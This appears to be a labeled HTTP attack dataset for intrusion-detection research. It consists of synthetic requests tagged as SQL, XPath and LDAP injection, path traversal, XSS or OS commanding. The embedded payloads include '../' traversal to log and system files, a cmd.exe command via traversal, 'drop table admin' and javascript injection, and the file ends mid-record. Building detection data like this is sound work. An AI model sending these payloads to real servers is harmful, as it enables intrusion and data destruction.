X-Serial-Number: 17196143235816087076
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40805
Start - Id: 35710
class: XPathInjection
GET /tEfNTVn/lGns-NbVLRDn/eQ/njnemnfveye/u_QTY.zXtJLQdu/eHKX_Tl@t_sQxUwC@iI/us6wadrmthi8A1p/uooG__k7SfeLhhk2v1R/eepOm/aHyfmesceTsir8I0i/iteOgBgiE/aZeIoBMa5u0t.asmx?ehftui4rAne=sgnvSjxBi&un7oosrsae2o5te=9L&S5reki=14383219&ErpsA1-=92++++or+++u%2Flsh%2Fnutj%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D226%5D++or+++143%3D&Umedeokthro=r6&noDt=sAxb4-Zi&tl=unionn4rd&c7=m&5mcol3=piBchneo&tyzsshnr2A=wH-gkl1LBSwa&sOl8r=0&ti1sdhdbzrwh=ofd&Annrignlct=67 HTTP/1.0
Host: www.bbrdmm.uk
Connection: pGcsjqsE
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.9
Cache-Control: max-stale=9978
Client-ip: 144.129.84.108
Cookie: suctdehsisY=9o= 
Cookie2: $Version="64"
Date: Sat, 16 Jun 07 03:24:24 CET
ETag: W/"3V3tBdlDozt7JvZcGC"
Expect: 100-continue
From: 0iiTea@WooaceteB.de
If-Modified-Since: Sun, 01 May 05 15:12:17 UTC
If-Unmodified-Since: Sun, 26 Jun 05 11:12:37 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 04 Aug 05 06:13:09 UTC
Max-Forwards: 7481
MIME-Version: 8.0
Pragma: 6tlirn=dI99Re
Proxy-Authorization: Digest cnonce="N2rrnfo"
Authorization: Basic ZWRzeFRpaGI6dHNybWlw
Range: 5225-,8-9,1-
Referer: http://www.aIr8.uk/ieuwn/jehdoda/Llgl.asmx
TE: trailers,gzip;q=0.6
Trailer: User-Agent
User-Agent: Mozilla/5.7 (Machintosh; U; PPC 1.2; sH-fE; rv:1.9.4) Gecko/44635514
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 161x6887
Via: 0.8 www.ssuT.png:50909, FTP/9.3 8.221.183.118, 2.6 www.ctgmn1.js
Transfer-Encoding: gzip
Upgrade: acPhne/6.3, xettw/7.0
Warning: 793 32.218.57.169 "eazenA2aeien9eE9jtir" "Sun, 17 Jan 10 06:57:02 CET"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35710
Start - Id: 46165
class: PathTransversal
GET /Tcmd9/8hVlaFDudePTvn_W.nsf?nealUetg=..%2F..%2F..%2F..%2Fvar%2Flog%2Faccess_log%2500.html&m7oyEryodr=623189&atuer=Pe%5C%26o%26e%40rse+eAr&Yle62dG8=5651004&a6Uo=ha0e6e58eoaiixe HTTP/1.0
Host: www.nnotlh.biz:80
Connection: dtNce
Accept: */*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: mt-Bn0d, i-xfns, etohA-tsl0, TiSehoWr-omEHeeot
Cache-Control: max-stale
Client-ip: 231.104.230.202
Cookie: anEseg=q etcdc/oselssnoas  iperll;Hio6tersw10e=083712;9heelem=tj6q
Cookie2: $Version="276"
Date: Mon, 26 Feb 07 16:26:28 CET
ETag: W/"IKbJLxE1_ixqcRxyA"
Expect: xslbWe=dne4
From: itSee@io7o.gov
If-Modified-Since: Fri, 26 Sep 08 18:24:30 UTC
If-Unmodified-Since: Sat, 13 Jan 07 24:59:58 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 08 Apr 04 02:32:00 UTC
Max-Forwards: 636
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: slso ala9=euegghy
Authorization: hS5tbn eneaviiR=hotohIe
Range: -51066
Referer: /tPcszE/mettfoye/gkaerb/hspis.cfm
TE: trailers,gzip,gzip
Trailer: Proxy-Authorization
User-Agent: ioooprderk/8.8
UA-CPU: StrongARM
UA-Disp: 5013,9581,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 390x0476
Via: 6.9 63.96.226.125
Transfer-Encoding: styatH
Upgrade: efs/0.6
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Forwarded-For: 7.188.220.215
X-Serial-Number: 143207616945
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 46165
Start - Id: 49763
class: XPathInjection
GET /xH4eEwTtsEmlciyoT1in/stdin6V2var_A2L.xI_W/hkwetHsdhb2taktsei/ieay/ujeiirabtL/ot1oFC/sm/oLUjD/lnw1rqoHOOgit3no.gif?fn6eZaetadid=3&iOnisriPti=pBwa&XNdr3oDet=rhtaes6da&Mheemiitjtepita=gFpixoH0&nafhw8uaJwaex=uie&Kk1hand17M_K=9945+or+ofbs%2Fw0n%2Fs%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D105%5D++++or++8118%3D&adEjys8ml=oNoY8kY&inrraLitslhtesr=oo0s5swhhnhtja HTTP/1.0
Host: 122.217.226.203:5711
Connection: keep-alive
Accept: application/zip, image/jpeg
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 253.1.218.202
Cookie: yOYecho03=jt;g9f=32;tn=hZcams
Cookie2: $Version="367"
Date: Thu, 13 Mar 08 10:45:49 UTC
ETag: W/"gejDXjnrS6tpYzTu_6xQ"
Expect: 6itn=bdoaua
From: 1ni9pe@Genwbli.net
If-Modified-Since: Sat, 23 Jun 07 08:01:21 CET
If-Unmodified-Since: Mon, 29 Mar 04 19:53:20 UTC
If-Match: "c98mJwrmUi-fEew6u"
If-None-Match: "DCGQMlwt9OyStRuonJp"
If-Range: *
Max-Forwards: 3620
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM ZXNScWFmc2VueXpMc3Vlb255ZXNudWVhc2JlZXU1clRzaUhlY2lk
Range: 038-33,-803
Referer: /e0sh/8emn5/surh/ntee3u.pl
TE: chunked,chunked
Trailer: Referer
User-Agent: Mozilla/2.1 (X11; U; Unix 5.5; hm-aa; rv:1.7.5) Gecko/36460208
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3095x7377
Via: 3.8 45.22.241.126, 6.3 www.iiw8h2g.css, 5.1 www.ksre.css:4086
Transfer-Encoding: deflate
Upgrade: 2LiSEs/6.7, it8er/8.1
Warning: 313 www.rnatjdd.tiff "ikOaheaoton2wee" "Wed, 13 May 09 04:48:39 UTC"
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49763
Start - Id: 49959
class: XPathInjection
GET /f3qf6T7Xgux/aKIc4Fwbptg/rrnonl8e/eLxguee2nvRwE0/1oteNarAwoottnt6peh/eesjrskBFosn/tUrhkCFMadR3QN85eaXQ.exe?Rc@OXt2ZQ=owha3osu%27+++++or++%28i++++%3C+++count%28srt%2Fchild%3A%3Atext%28%29%29++++and++++j+++%3C+++count%28hhemo%2Fchild%3A%3Acomment%28%29%29+and+k++%3C+++++count%28eo%2Fchild%3A%3A*%29++++%29+or+%27aL%27++%3D+%27++ge%27+++or&Go81wtTet=1&LIag.Ymuxtermj=t%3Fan5&tatnoiihlbua=n&sjquombOctKI=ib6S6%40Wh-&soM8sReo=%7CnsxnetiNd%3Fhaccess_log-O&wenp6r9jsmfhae=iianlh2cda&oOOhM=mstdinhome&rtsec=u+au&zupdate8-b=ah&fz1leoNnrtl=8957798&5vsp7vrgnwgJci=e HTTP/1.0
Host: www.onsn.fr
Connection: close
Accept: video/quicktime, video/*;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: b-Bem1c, o4msewE-v, Vdtrh-rtdeeera;q=0.0
Cache-Control: max-age=97309
Client-ip: 178.2.112.138
Cookie: dmTenenIb=object=;Sooshih=65193327;ycPp7=1pR9iifV-ER;eeiasu=asnenH=6;ndo=en@AFrkeHOB;iuZASZRf=759253
Cookie2: $Version="749"
Date: Sat, 12 Nov 05 02:16:11 GMT
ETag: W/"hQ4l.RD7dOpBmeEgodH"
Expect: 100-continue
From: ekeat@ojhpuenrL.gov
If-Modified-Since: Tue, 06 Feb 07 11:19:53 UTC
If-Unmodified-Since: Tue, 02 Mar 04 01:13:48 UTC
If-Match: "RWnmxSedGag5Mgh@YI"
If-None-Match: *
If-Range: *
Max-Forwards: 459
MIME-Version: 0.7
Pragma: wj='reioOri'
Proxy-Authorization: Digest username="eo31e"
Authorization: NTLM ZW50ZU9idGRtb295OW50eWFPeUp0MHRubXM3SHRzdXRic3Vybg==
Range: 88781-3
Referer: http://nier.uk/ricbtse/tea15u/aeEece/hnnctreo.gif
TE: trailers,chunked;q=0.1
Trailer: If-Match
User-Agent: eD7EWM http://www.Atumt.de
UA-CPU: x86
UA-Disp: 2308,4283,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 207x5488
Via: 2.9 63.93.102.63
Transfer-Encoding: gzip
Upgrade: c6nsO/4.6
Warning: 631 www.reelek.js "sooCrilind" 
X-Forwarded-For: 199.10.120.226
X-Serial-Number: 84157643689
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49959
Start - Id: 45470
class: PathTransversal
GET /3zHGStuqYfgPC3.vio.html?A5ainclude=%5CWINNT%5Csystem.ini&eawaadgotIim=7s3deBQn0us4&kaFAstylevewtelnet=wlyr&gctafo2ii8iA=Tdindus&FKn.MCquAQC=tUgRDnS59&autoexeco2KE=n08smfN2iVe3&nTi4inhautlhaee=eRme94jqRt HTTP/1.1
Host: 83.15.92.141:7
Connection: 9qiaeeao
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: hi2cyo-loiinko;q=0.4, dpNh-f8hnS;q=0.8, mf-enu, moerhwm-sitd, drtat-tyteO
Cache-Control: no-cache
Client-ip: 172.157.36.227
Cookie: asdntprsrru=se
Cookie2: $Version="810"
Date: Fri, 20 May 05 12:31:37 GMT
ETag: W/"iXz_cecXNgktO.yx06"
Expect: tsgnr=xneob;kaoe=dnfiebmk
From: 9lho@aiRe.net
If-Modified-Since: Tue, 25 Aug 09 15:28:35 UTC
If-Unmodified-Since: Sat, 18 Oct 08 06:54:53 GMT
If-Match: *
If-None-Match: "5yLmK20fyd55FHb"
If-Range: "b@ZGNKyKVgff-0Kbr73"
Max-Forwards: 72
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest algorithm=ohi4
Authorization: Digest cnonce="dlear"
Range: -23,7962-,63876-540949
Referer: /mUln5.tiff
TE: trailers,gzip;q=0.2
Trailer: Warning
User-Agent: Mozilla/5.9 (Windows; U; Win 9x 1.8; cz-eh; rv:6.7.3) Gecko/26011671
UA-CPU: x86
UA-Disp: 8084,8855,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5163x468
Via: FTP/6.1 50.246.134.210, 8.0 80.80.231.46:6, 4.9 172.134.189.2:0
Transfer-Encoding: compress
Upgrade: drf/1.3, eoe/9.9
Warning: 016 www.lea2ce.html "yMifIhorneae" 
X-Forwarded-For: 150.175.159.37
X-Serial-Number: 49844
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45470
Start - Id: 38189
class: LdapInjection
GET /gII7KkQekzq/kIDIn/I@nqGnQ.bin?iFohna=42331&diiNdar=%29+%28+++%7C++++%28+++cn%3D*o+++%27brien*+%29%28mail+%3D*o+++%27brien*%29+&zehttps6_pP=%3Bh7oeoxtaa5i6s HTTP/1.1
Host: 35.109.135.230
Connection: hoi0rtn
Accept: */*;q=0.5
Accept-Charset: windows-1251, iso-8859-15, shift_jis
Accept-Encoding: identity
Accept-Language: *
Cache-Control: max-stale=81175
Client-ip: 186.3.228.230
Cookie: hwcuyaoeots5= hy;hrr2enaspmsW=ty
Cookie2: $Version="50"
Date: Tue, 13 Jan 04 17:26:28 GMT
ETag: W/"cvMbx4sfux4.USQJj"
Expect: anoae=Rywdsuv
From: nethi@otsenrjp.biz
If-Modified-Since: Thu, 31 Aug 06 21:36:03 GMT
If-Unmodified-Since: Wed, 04 Jun 08 21:23:40 UTC
If-Match: "PCpCyEr4wBxZbGeJS"
If-None-Match: *
If-Range: Fri, 27 Feb 04 01:59:53 GMT
Max-Forwards: 818
MIME-Version: 9.1
Pragma: at='ca'
Proxy-Authorization: rlgd pkAree=ohoel
Authorization: Basic SG51N2U6ZXNFbnJm
Range: -49,281-
Referer: http://www.b6el.st/NcRug.txt
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/2.7 (compatible; Konqueror/4.3; Unix; an06eoQa; tliezs; ehYoj1)
UA-CPU: PowerPC
UA-Disp: 747,821,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5505x7135
Via: HTTP/4.9 www.ntt4eA.jpg:06
Transfer-Encoding: deflate
Upgrade: rho/1.8, riptm/6.0
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 092315765
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38189
Start - Id: 46717
class: XSS
GET /.xmlaF8/7zwlxaTm-8Fe/sbQ2XeWILCZT2SUU8M.J/vaEhd/afhE/aAsl8jWHi8@2Qf/uue9sehdzAu3lkr/oweitMrhesemuo.jsp?4OiZ1yltmp=e1pPJNc&jesk8dnt=e%40eLe&iit0tabsflrv=thttymfweOan1&QpqleWb=0921&lohaslnelcetlse=a6l6n&Er2ubPheSsfr6k=33496563 HTTP/1.0
Host: www.gatr3.it
Connection: inc2
Accept: video/quicktime;q=0.9, video/mpeg
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: min-fresh=7
Client-ip: 72.198.142.17
Cookie: 3ed=<div  style =   " background-image:     url(javascript: [alert    ('aCi');]);     "    >
Date: Tue, 16 Dec 08 22:06:57 GMT
ETag: "uOQtuQrJuA-mfrp-"
Expect: cuqV
From: anere9f@oidevoD.uk
If-Modified-Since: Mon, 16 Nov 09 17:55:50 UTC
If-Unmodified-Since: Wed, 26 Mar 08 21:09:46 CET
If-Match: "I9X2hB3CkTxQGCQMoy"
If-None-Match: *
If-Range: Fri, 12 Oct 07 12:57:58 CET
Max-Forwards: 191
Pragma: no-cache
Proxy-Authorization: Digest uri=/aTwnonr/iuqss.jsp
Authorization: NTLM dmFkbGlycnVubWNjdGFUc2N0ZG03aW5mbWVlcWlpMWduYUF5NmFyYUM=
Range: -3,-90081,-299741
Referer: /beafA/Mjhh.asp
TE: trailers,gzip
User-Agent: Mozilla/3.9 (X11; U; Open BSD i586 7.3; or-oe; rv:6.1.7) Gecko/72945492
UA-Disp: 365,342,16
UA-OS: Windows 95
Transfer-Encoding: au42n; skfGaima=rmdIri
Upgrade: agsTiD/9.5, auiIof/4.8, ntt/0.2
X-Forwarded-For: 166.176.57.0
X-Serial-Number: 15071765483594202
----: ----------------------------------

null

End - Id: 46717
Start - Id: 44429
class: OsCommanding
GET /file.bat/..��..��..��winnt/system32/cmd.exe/c dir C:georgi.asp/..��..��..��file.ext? HTTP/1.0
Host: www.unhh1DzvbT.org
Connection: keep-alive
Accept: image/gif, text/*;q=0.5, audio/*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: min-fresh=368
Client-ip: 27.105.36.250
Cookie: Ht6UF5Hds=rLyrts;-.mMYLFawr3=ua5I6nN6Igei
Cookie2: $Version="74"
Date: Fri, 09 Feb 07 10:50:17 CET
ETag: "2tnZ37xD4wGUw-x"
Expect: 100-continue
From: unh1Ohh@nhsboy.biz
If-Modified-Since: Sat, 25 Feb 06 16:45:11 CET
If-Unmodified-Since: Mon, 29 Dec 08 06:09:27 GMT
If-Match: "hQOO.YwZs1b3wzs_H"
If-None-Match: "ohsyFQjZoPfd62U"
If-Range: Wed, 13 Jan 10 11:33:43 UTC
Max-Forwards: 2163
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="orIrleta"
Authorization: ltsapd bGeI7t=ierdreT
Range: 6-02287,72753-
Referer: /hhlAaemo/hQtee/yHeErc9.html
TE: deflate;q=0.1,chunked
Trailer: Accept-Encoding
User-Agent: t0ho (wlT8UalT3; nlQuFLz99n; 8bRJ_4; 9G-LXM)
UA-CPU: Sparc
UA-Disp: 712,4716,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 053x237
Via: 8.5 66.3.123.210, 2.7 249.88.93.53
Transfer-Encoding: gzip
Upgrade: esoj5m/0.8
Warning: 041 www.nmtu.css:96410 "tmhhadncfjtereqA" "Mon, 28 Sep 09 17:32:04 UTC"
X-Forwarded-For: 156.154.164.214
X-Serial-Number: 42253
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44429
Start - Id: 42312
class: SqlInjection
GET /uvTbEEqeac/ue/eejear/md@CofMQkxOJPPr/iuq3lOyl0WhxyQ/hCp/cKJ1autoexecaJiG6A9b/ii0nR_9P2O2/Hodna/bts/ebCchia5Ri/iibUQmc5o865Hh5Cg.exe?2eiuaawTu=36250&isoel1cn87tMiat=wh+noconnectohnalink+v%29ssu5ur&atahushr=s&OAgBsyyQZ=aeepcaosnsetu81&OoRidc0Ao=y%26&PcZdVleK=5xwvng&c3wire=%27+OR++%27ellraee%27+++%3E+%27S HTTP/1.1
Host: www.4tzabtE.st
Connection: kozYbniu
Accept: video/*, application/rtf, text/html
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, deflate;q=0.3, compress
Accept-Language: aotosb-yee5;q=0.7
Cache-Control: no-store
Client-ip: 50.218.71.30
Cookie: pavf8ltz=01015221;le7haeg5hr=3;lo8=f 
Cookie2: $Version="134"
Date: Thu, 06 Dec 07 05:21:45 UTC
ETag: "3b.fk.WCMYAXJiT2"
Expect: nlsq
From: h5dt@dgwd.cz
If-Modified-Since: Mon, 18 Aug 08 05:42:43 UTC
If-Unmodified-Since: Thu, 20 Jul 06 18:19:51 CET
If-Match: *
If-None-Match: "lUwiy4XMBqqwuBzE-9O"
If-Range: Fri, 26 May 06 01:59:13 GMT
Max-Forwards: 7222
MIME-Version: 7.7
Pragma: meeo0v=eNiiDits
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Basic dHZhSWJjaTpucmVVdzk=
Range: -87,-776,05-6302
Referer: /jiarlseo/huean9.zip
TE: deflate
Trailer: Accept-Encoding
User-Agent: enocs9nRi (vJ7J.Pz; t7YpA_7jLo; rofayQoe)
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 4371x6437
Via: 4.2 55.207.170.82, 4.0 188.152.14.120
Transfer-Encoding: t5ebt
Upgrade: i7iya/1.9, iT3ylo/7.2
Warning: 791 www.41LmwOrr.jpeg:2 "hepateeosst" "Mon, 30 Apr 07 18:30:13 UTC"
X-Forwarded-For: 235.94.27.226
X-Serial-Number: 807714416153290560
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42312
Start - Id: 45567
class: PathTransversal
GET /kSxCnOc/w2/between7dXHF_olsssGe/g5ZZkJQIe/objectRIfu.shtml?v4NNjD6U=9ee5s&e0iwg=1rioaTbbamurndnauh&rtoeho=%5CWINNT%5Csystem.ini&noedrmino=69&Lhpr=%28w%27&Et=OP%3Be&nnlEpdet=1304540&nzh7harstin2aed=e%3Awindow.open%3FngE8igmnjtmpc%5DHRvk HTTP/1.1
Host: www.6ryon6dr.biz:3508
Connection: keep-alive
Accept: text/*;q=0.5
Accept-Charset: iso-8859-7, x-mac-chinesetrad;q=0.4, x-mac-cyrillic;q=0.5, iso-10646-ucs-2;q=0.6
Accept-Encoding: *;q=0.2
Accept-Language: nntsshie-o;q=0.9
Cache-Control: min-fresh=0
Client-ip: 80.183.70.158
Cookie: 26ejuiimmAao=nRil'sp h%ud;AstdinallPwGinboot.iniEb=8Xip@exXl;qrpLOlhhee=taHY9YLf3t;anr6fp=08496;tiemrEBwoi=0826195030;t4elqo9=cef1nehnde8EU
Cookie2: $Version="88"
Date: Sat, 16 Feb 08 16:07:58 UTC
ETag: "IiAPylRuCsm05lJzLT"
Expect: 7Sjsoaml
From: nnmuo@mspetgyxi.de
If-Modified-Since: Mon, 06 Aug 07 07:13:22 CET
If-Unmodified-Since: Mon, 10 Aug 09 04:12:42 UTC
If-Match: "rbhom4rMGF6KTTGqHTZF"
If-None-Match: *
If-Range: "Z@A5VKN5TR3g4pnbYeNg"
Max-Forwards: 9
MIME-Version: 9.4
Pragma: bni0ia=czmr9c
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest nonce
Range: -2
Referer: http://www.zeittApe.be/etnb/ahtaoli.mspx
TE: deflate,gzip;q=0.2,gzip;q=0.7
Trailer: Upgrade
User-Agent: tmrNlabn/3.8.3
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 220x9820
Via: hPI/3.9 www.uem3eaht.html
Transfer-Encoding: compress
Upgrade: ggC/2.3, d2sU/5.6, shIm/3.2, ehs/6.3
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 58.229.7.205
X-Serial-Number: 86157391207979195
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45567
Start - Id: 47432
class: XSS
GET /G3aE4documentufXW5/adktap3Sypw6r.htm?W@Uinsert8XjrbpsW=%3Cform%2Bname%3DtstSl++++%3E%3Cselect%2Bname%3Dsexm+%3Ehttp%3A%2F%2Fwww.wig7f.com%2Ftfd%2F%3F%3C%2Fselect%3E%3C%2Fform%3E HTTP/1.0
Host: www.aHel.fr
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic;q=0.8, big5, iso-8859-4, cp-932;q=0.3, isiri-3342
Accept-Encoding: identity, gzip;q=0.0, identity;q=0.1
Accept-Language: *
Cache-Control: min-fresh=6074
Client-ip: 150.26.240.194
Cookie: ip6eenaeehpt= le;XB2tVQKvoreplace=errs
Cookie2: $Version="05"
Date: Thu, 15 Jan 09 12:59:52 GMT
ETag: W/"EmqnteRvZct92Od"
Expect: 100-continue
From: 0hOsn@ivHe.ch
If-Modified-Since: Sat, 07 Apr 07 17:33:18 GMT
If-Unmodified-Since: Sat, 09 Dec 06 24:36:53 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 25 Jan 10 06:50:33 UTC
Max-Forwards: 6633
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Basic ZVJkN2g6b2FsMw==
Authorization: Basic YXQ5c2VwdDpycWxkQXpJdA==
Range: 13744-31405
Referer: http://w7isp.st/ung0/e6EeEw/7lie.fgf
TE: chunked
Trailer: Referer
User-Agent: wiiida (vow8nB; rwhtkuvAd; y1DV4G)
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1670x058
Via: 2.7 www.esineboj.gif, 2.9 193.87.222.72, HTTP/2.0 www.senp.html
Transfer-Encoding: deflate
Upgrade: cn0/7.2, eS1l/7.0, wilq/0.5
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 168.182.251.139
X-Serial-Number: 79894871032971877602
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47432
Start - Id: 42761
class: SqlInjection
POST /ilchwuw3noeiospyid/Ilink-_aU/7o/6m1/itmolh/G6DhL%uaSQwI80wherey.jpeg? HTTP/1.1
Content-Length: 196
Content-Language: tainto,7se7tN,6u4esA
Content-Encoding: gzip
Content-Location: /n4riat/qtwS/tEeu.mp3
Content-MD5: bmVoYWVsc25pdGl0aXRlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 22 Jul 09 15:55:33 CET
Last-Modified: Tue, 21 Jul 09 01:08:50 CET
Host: 45.30.94.102
Connection: a6uw
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: ttt0Oii-n;q=0.9, thttdr-msnt;q=0.0, etewbh-e4oe;q=0.6, beiT-h;q=0.3
Cache-Control: max-stale
Client-ip: 112.148.147.44
Cookie: dmtzh=oSyn;eow=699448464;JJcHrQGagCJ=4255815522;Tedm1n3ees=';  drop table    admin;mckaxei=sgurtTope
Cookie2: $Version="823"
Date: Sat, 09 Dec 06 09:14:24 GMT
ETag: W/"bgO4TBcw3v9icYmOs"
Expect: 100-continue
From: ehrms74s@essu1ta.fr
If-Modified-Since: Tue, 07 Apr 09 22:31:13 CET
If-Unmodified-Since: Thu, 02 Feb 06 21:39:43 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 26 Dec 07 23:30:33 CET
Max-Forwards: 54
MIME-Version: 3.6
Pragma: enTl1i='s'
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest nonce
Referer: /tsb1g.tar
TE: gzip,trailers,gzip;q=0.5
Trailer: Connection
User-Agent: 9msn (wVw@zCDd0; rP7cmRVyVn; sSzBV0t2; ecKAz9dqg; ytacXDNyB9)
UA-CPU: Sparc
UA-Disp: 2042,3575,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 885x378
Via: 8.4 148.78.105.44, HTTP/1.2 www.mrZu2t.html
Transfer-Encoding: compress
Upgrade: aiho/8.7, m9e/5.0
Warning: 063 www.twusoE7n.tiff "h0ilrcaegxedeyblh" "Tue, 22 Feb 05 11:38:52 CET"
X-Forwarded-For: 112.9.167.251
X-Serial-Number: 96344333906
----: --------------------------

tDn=602&0ontdc=rsg l$ahmTm'uht&v7a6insertu1havingnNVj=ature&drl8selospol=mailt]h&eoneobntHnet=miq4aa8l9g9ooKt&sil0=83992&mn8ycyao=ft8&mel9NfdqbP=ySnWotcOhSs&homwpuabhS1onn=snesrahS&Pw8Lf=sbd

End - Id: 42761
Start - Id: 38374
class: LdapInjection
GET /hkt1X7UBSFN@Gh/nsNuetalHr/zezNug1sbpnecEetlsc.php3?ets=88153&iaselens=tupdate%296+0aautoexecao0l0dd&od=645&sN6Yo=%29++%28+%7C++++%28Caeid%3Dfoa*%29&Ix8rlrOecuedbeb=1encn&tRbOlGtq.G_L=ite+ebltmpte&b-IT_TmetaghttpB0O=eexecp8&yttdsenI=hxeb6tuazrr&eSsrese0s41idLn=%5Dformr%3Dphpt6ercncyx&s8rfehlaeynanl=ui%27knph-Y5v6bne&nedfokoxdsxpm=96&ein=41355674&SRDS=6120823&lrlYefutasxmost=mwhereeboot.ini+ihtaccessy1 HTTP/1.0
Host: www.ismhe.it:80
Connection: Gsmr
Accept: text/*;q=0.8, text/*;q=0.7
Accept-Charset: isiri-3342, big5;q=0.5, iso-8859-2;q=0.6, x-mac-ce;q=0.2, windows-1254;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 41.189.98.25
Cookie: soexcziimt=unqeobaR-nie5bh?stdinr;fx38=6ntmp;oeRr9egtt=tKecXKxE
Cookie2: $Version="9"
Date: Tue, 17 May 05 07:35:36 CET
ETag: "_tbcCy0@wz8M8jd"
Expect: hteo
From: frlm@ctsi1ez.ch
If-Modified-Since: Tue, 27 Jul 04 24:52:40 UTC
If-Unmodified-Since: Wed, 04 Nov 09 20:13:54 CET
If-Match: "x3Veeu-2SRCXR1YS"
If-None-Match: "VMlKZpg.b@p@Cc4P0hF"
If-Range: Thu, 25 Oct 07 02:09:59 CET
Max-Forwards: 6
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic dGlkaVI6ZDllUnJhcg==
Authorization: Basic c2dsb2VzOmx0c2NCNHM=
Range: -0,582766-
Referer: /ishh.mdb
TE: deflate;q=0.4,chunked;q=0.1,deflate
Trailer: Referer
User-Agent: p43t2ya (gAWLQ9f; vD1n2e)
UA-CPU: 68000
UA-Disp: 6597,6108,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 6897x261
Via: FTP/8.6 www.hvo5n.gif, baibtc/9.7 139.26.137.7
Transfer-Encoding: deflate
Upgrade: o1jc/2.3, igt/0.7, Hce/5.3, re9/4.3
Warning: 306 www.u4zhxszn.shtml "rahmw" 
X-Forwarded-For: 18.81.134.210
X-Serial-Number: 9579642646846
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38374
Start - Id: 46769
class: XSS
PUT /8uieyVtatybe7ih.htm? HTTP/1.1
Content-Length: 249
Content-Language: 5,r5idQqbi,Qdcn
Content-Encoding: deflate
Content-Location: http://www.atnn0rp.de/v5hXa/sato0Nr/s6nvti.php4
Content-MD5: ZnV3ZHpSZmUxdnZ1UmRjZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 12 Dec 09 07:00:12 CET
Last-Modified: Sun, 03 May 09 22:25:28 CET
Host: 31.139.126.86
Connection: sttefl5i
Accept: */*
Accept-Charset: gb2312, utf-8;q=0.8, ks_c_5601-1987, x-mac-cyrillic;q=0.5, iso-2022-jp
